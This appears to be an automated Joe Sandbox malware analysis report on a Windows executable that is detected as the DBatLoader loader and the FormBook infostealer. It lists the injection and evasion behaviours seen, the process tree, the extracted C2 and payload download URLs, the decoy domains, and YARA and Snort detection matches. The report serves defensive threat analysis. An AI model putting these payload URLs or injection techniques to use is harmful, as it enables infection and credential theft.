Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0321423605241625.exe

Overview

General Information

Sample Name:0321423605241625.exe
Analysis ID:756155
MD5:edb1382c354ec6c09c53473e5335703a
SHA1:a1a5fbfce034731cba1072bab6b97b26c8a90c79
SHA256:c2c6eec67a1561c3a49179ddf756480876d92588c2e83d64246a04c3d724cb3d
Tags:exemodiloaderxloader
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected DBatLoader
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 0321423605241625.exe (PID: 3140 cmdline: C:\Users\user\Desktop\0321423605241625.exe MD5: EDB1382C354EC6C09C53473E5335703A)
    • colorcpl.exe (PID: 3576 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Mwqrxeuz.exe (PID: 5528 cmdline: "C:\Users\Public\Libraries\Mwqrxeuz.exe" MD5: EDB1382C354EC6C09C53473E5335703A)
          • colorcpl.exe (PID: 4028 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
        • raserver.exe (PID: 5928 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 4028 cmdline: /c del "C:\Windows\SysWOW64\colorcpl.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}

Threatname: DBatLoader

{"Download Url": "https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\zuexrqwM.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x58:$hotkey: \x0AHotKey=2
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\zuexrqwM.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6191:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1aee0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x97ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x148b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 57 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.colorcpl.exe.10410000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.colorcpl.exe.10410000.3.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6191:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1aee0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x97ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x148b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        1.2.colorcpl.exe.10410000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.colorcpl.exe.10410000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        1.0.colorcpl.exe.10410000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 38 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5217.160.0.9549719802031453 11/29/22-18:26:33.912103
          SID:2031453
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5192.0.78.14149715802031453 11/29/22-18:26:08.582417
          SID:2031453
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5217.160.0.9549719802031412 11/29/22-18:26:33.912103
          SID:2031412
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.552.85.92.8449717802031453 11/29/22-18:26:23.800962
          SID:2031453
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5217.160.0.9549719802031449 11/29/22-18:26:33.912103
          SID:2031449
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5192.0.78.14149715802031449 11/29/22-18:26:08.582417
          SID:2031449
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.552.85.92.8449717802031412 11/29/22-18:26:23.800962
          SID:2031412
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5192.0.78.14149715802031412 11/29/22-18:26:08.582417
          SID:2031412
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.552.85.92.8449717802031449 11/29/22-18:26:23.800962
          SID:2031449
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: 0321423605241625.exeReversingLabs: Detection: 35%
          Source: 0321423605241625.exeVirustotal: Detection: 40%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus / Scanner detection for submitted sample
          Source: 0321423605241625.exeAvira: detected
          Antivirus detection for URL or domain
          Source: www.rematedeldia.com/euv4/Avira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeAvira: detection malicious, Label: HEUR/AGEN.1214697
          Multi AV Scanner detection for dropped file
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeReversingLabs: Detection: 35%
          Machine Learning detection for sample
          Source: 0321423605241625.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeJoe Sandbox ML: detected
          Source: 1.0.colorcpl.exe.10410000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.0321423605241625.exe.2170000.0.unpackAvira: Label: TR/Hijacker.Gen
          Source: 1.0.colorcpl.exe.10410000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.raserver.exe.525796c.4.unpackAvira: Label: TR/Crypt.XPACK.Gen8
          Source: 1.0.colorcpl.exe.10410000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.colorcpl.exe.10410000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.raserver.exe.a3cda0.1.unpackAvira: Label: TR/Crypt.XPACK.Gen8
          Source: 1.0.colorcpl.exe.10410000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.0321423605241625.exe.2231218.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0321423605241625.exeMalware Configuration Extractor: DBatLoader {"Download Url": "https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo"}
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}
          Source: 0321423605241625.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: Binary string: colorcpl.pdbGCTL source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02175B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.rematedeldia.com/euv4/
          Source: Malware configuration extractorURLs: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox ViewIP Address: 13.107.43.12 13.107.43.12
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: 0321423605241625.exe, 00000000.00000003.301183621.0000000000867000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307512986.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000002.00000000.351845290.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.310261242.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434855289.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
          Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PR
          Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307357943.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/
          Source: 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/U0
          Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/_
          Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/s
          Source: 0321423605241625.exe, 00000000.00000003.301289184.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3
          Source: 0321423605241625.exe, 00000000.00000002.307309131.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301144762.0000000000850000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/y4mcSg4TVpIg-eA6Y1ciUp4Dzz62AcO4SwOj-306Rp8dovP_vJs6bBF8upLxcpz7eVd
          Source: unknownDNS traffic detected: queries for: onedrive.live.com
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02188CBC InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
          Source: global trafficHTTP traffic detected: GET /y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3rlGujQmh2dpM-9vT8IEOnYjevggDBPg3L6krVTX5rpZ6Y9fWqq7mXN8HP0HSdlr6-fMy35G8DvzJqxvSasnXVIJpB-5dNG-tdgdNk_U_XYoTZ1ccJrC1sgInwIFqmsOi4T1bkt9-CIDRF_pvQqcEQA/Mwqrxeuzvim?download&psid=1 HTTP/1.1User-Agent: 92Host: ppqfqw.ph.files.1drv.comConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: 0321423605241625.exe, 00000000.00000002.306915554.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
